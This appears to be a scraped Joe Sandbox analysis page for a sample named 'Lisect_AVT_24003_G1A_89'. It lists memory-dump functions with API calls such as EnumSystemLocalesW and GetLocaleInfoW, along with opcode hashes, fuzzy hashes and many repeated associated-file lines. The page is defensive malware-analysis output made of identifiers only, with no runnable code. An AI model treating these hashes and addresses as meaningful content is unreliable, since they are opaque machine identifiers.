Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 39907b3b6547abf9912c6a003c965c54b817e289e220470d430a39b25938ff02
Instruction ID: a2bc05e12d601ce83e54e3609c4a0883d667f3f565154f1a49a2df4527a7bba3
Opcode Fuzzy Hash: 39907b3b6547abf9912c6a003c965c54b817e289e220470d430a39b25938ff02
Instruction Fuzzy Hash: 51F02232A00206ABC714AFF8D945EFE33ECEB58711F40417AA686DB280EA38AD048750

Function 010ADABD Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

EnumSystemLocalesW.KERNEL32(010ADD9B,00000001,?,?,?,?,010AE144,?,?,?,?), ref: 010ADB07

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 37e8c9df3a0b21c219afe274be1ce085af1912930bf3a921efd8211fc53cd285
Instruction ID: 80363c09adccba1759d7926ebbb35b06cd8085152282daf3161fdc5623f3dba5
Opcode Fuzzy Hash: 37e8c9df3a0b21c219afe274be1ce085af1912930bf3a921efd8211fc53cd285
Instruction Fuzzy Hash: 1EF022323003045FDB245FB98890AAA7BA5EB81668B45446CFA824BA80C6B29802C700

Function 010A49BA Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0109D777: RtlEnterCriticalSection.NTDLL(?), ref: 0109D786

EnumSystemLocalesW.KERNEL32(010A49AD,00000001,010E1268,0000000C,010A4DE2,?,?,?,?), ref: 010A49F2

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: f8697f323c0a2ec52c10f1ec83aad8a0c570721b7e40a95bb77ad4bac3039081
Instruction ID: e2abd3d5bb4f90e1478a2a63bd9e63b53050f61a47ce5b5e3a1029e125944166
Opcode Fuzzy Hash: f8697f323c0a2ec52c10f1ec83aad8a0c570721b7e40a95bb77ad4bac3039081
Instruction Fuzzy Hash: F5F0AF7AA04204EFD710EF99E845B9C7BF0FB08B21F00451AF490DB2A0C7BA4901CF40

Function 010AD9D7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

EnumSystemLocalesW.KERNEL32(010AD930,00000001,?,?,?,010AE19E,?,?,?,?), ref: 010ADA0E

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1a49d4f6f613e0ff66413c35a85f9db9e927cd02fa2b83e88920e215ff847b2f
Instruction ID: 3f278aa1e13f2555bec665191cce2dad4abf9aa503c81792750f090e28512d67
Opcode Fuzzy Hash: 1a49d4f6f613e0ff66413c35a85f9db9e927cd02fa2b83e88920e215ff847b2f
Instruction Fuzzy Hash: CDF0553A30020557CB159FB9C8456AABF94EFC2A10B8A409CFA898F640C632D843C790

Function 010A4F3D Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?,?,?,010A15F9,?,20001004,?,00000002,?,?,010A0BEB), ref: 010A4F71

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 143e135ddaa7ddcd189291866252326825127a29d0f4d3e03d2dae03fa2f76b6
Instruction ID: cf842314583886df869d69555cb4b06227b2a89310d91b5b99cd547d88ed6bad
Opcode Fuzzy Hash: 143e135ddaa7ddcd189291866252326825127a29d0f4d3e03d2dae03fa2f76b6
Instruction Fuzzy Hash: 07E08639500118BBDF226FA0EC08EEE7F59FF54760F484011FD85A6161CB7699219BD4

Function 01898D69 Relevance: 1.5, APIs: 1, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmp, Offset: 01112000, based on PE: true

Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59e0b6ab05e6d3754ddb5aff43c09232110fbd5af72607475b8ba49c72dfe952
Instruction ID: f7a70bf0ff2aa0621eb900fe06f794aa07e7d7c3896efcbe0baf6abedd6b43cf
Opcode Fuzzy Hash: 59e0b6ab05e6d3754ddb5aff43c09232110fbd5af72607475b8ba49c72dfe952
Instruction Fuzzy Hash:

Function 01898D7B Relevance: 1.5, APIs: 1, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmp, Offset: 01112000, based on PE: true

Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b677d8d46514a3c72c2b06aea34cb8e8104c8a5924a8daa3c1c8b94d1fe0403
Instruction ID: 8f96e54d3adb3fed6220113db2ad46bc59484b87795abd4c0d3215ab3200b1b1
Opcode Fuzzy Hash: 6b677d8d46514a3c72c2b06aea34cb8e8104c8a5924a8daa3c1c8b94d1fe0403
Instruction Fuzzy Hash:

Function 00FB2040 Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

string too long, xrefs: 00FB2040

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 2141394445-2556327735
Opcode ID: 08115365cb46d6a194b282cb58bab90a228a9701605f77513c53e4fc0df00ff0
Instruction ID: d2b6d521280f5b3d7ee6cbc1f765ff2bc18f3d57812c22eadc45fee96821e4a0
Opcode Fuzzy Hash: 08115365cb46d6a194b282cb58bab90a228a9701605f77513c53e4fc0df00ff0
Instruction Fuzzy Hash: 53811275D041869FEB02CFA9C4517EEFFB1AF1A300F184199D994AB782C3798546DBA0

Function 01034C20 Relevance: .7, Instructions: 744COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d09dae959fbda9a1914dc1f51ebe21166aa9c6122aa1b87f88e03a7f5a665483
Instruction ID: 3cfdb621026a5d576b50766255eab27507eb8ec39b00767ab839e1cda00475df
Opcode Fuzzy Hash: d09dae959fbda9a1914dc1f51ebe21166aa9c6122aa1b87f88e03a7f5a665483
Instruction Fuzzy Hash: 8A626CB0E002059BDB54CF59C5846ADBFF5BF88308F2881ADD984AB352D776DA46CF90

Function 0109991F Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba66d91c6dc935394dd06463b90bb510e4559d994cd0e7c1df5d115c8601c1b
Instruction ID: 0b2a7affa3f23db11c0c6b148cd307a48fc8f5ebaeac7791cc96afe1abbcf615
Opcode Fuzzy Hash: 6ba66d91c6dc935394dd06463b90bb510e4559d994cd0e7c1df5d115c8601c1b
Instruction Fuzzy Hash: 3EC1FC7060064B8FDF65CF6CC9A4ABABBF1EF05308F18468DD9D687691C735A844EB60

Function 010AD1E1 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: eaf3258b31fed4e26ce2a0be1a44f37e7be8fb88e9b06e0a29fc3723a42b2505
Instruction ID: 0fc3b49b30977bd1e0c12dbcb1a09f91957527a45fac37bf972315688c74816f
Opcode Fuzzy Hash: eaf3258b31fed4e26ce2a0be1a44f37e7be8fb88e9b06e0a29fc3723a42b2505
Instruction Fuzzy Hash: 30B1F6755007029BDB299BE8CC81AFBB3E8EF54708F84856DE9C3C6981EA75F585C710

Function 00FB22C0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c631f431e3e305a13399d66cf2f7cfb926075034a35dc8dc6cf9d2d77db29113
Instruction ID: 5ae2a3a835015339563cdeacd566c9869d8ddbb48599f8e29dc014c796620f6d
Opcode Fuzzy Hash: c631f431e3e305a13399d66cf2f7cfb926075034a35dc8dc6cf9d2d77db29113
Instruction Fuzzy Hash: 1171D075E002468FDB15CF6AD8907EEBBB5FB1A310F480169D8559BA83C3399906DBA0

Function 01031940 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ad1c70fb7611a78e16ee93c219e234e188b403368d2d25889d59aa9a6c7ea8
Instruction ID: 0fa7e6daf204cdb60ab310f8916d5c9d37457cd0e6bb7c1886a7ee97909c383a
Opcode Fuzzy Hash: e7ad1c70fb7611a78e16ee93c219e234e188b403368d2d25889d59aa9a6c7ea8
Instruction Fuzzy Hash: 37616731720565CFD768CF1EE8D0536B751E38A3153858219EAC1C738EC53EE926CBA0

Function 01093ED8 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
Instruction ID: b4590d0aca44cc7bfc63cdce61b8a3e985a2294bb38c4fed482d3f2026bced17
Opcode Fuzzy Hash: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
Instruction Fuzzy Hash: 64516E72D00219EFDF14CFA9C950AEEBBB2FF88304F498099E555AB241D774AA41DF90

Function 01090750 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9fb7e8010b245f92a300f8ec1c5ba855b1f8370df443718f30ac94e2bbdfbb3b
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0211B67BA4114243EF94862DD8B86BFEBDEFAC523172D42FAF2D24B65CD1229145BD00

Function 7ECA1E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461588188.000000007ECA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ECA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7eca0000_Lisect_AVT_24003_G1A_89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5514b911be63635020df5e2a2dd3c9ac482895b02f3fdcba835224cf8f410a3
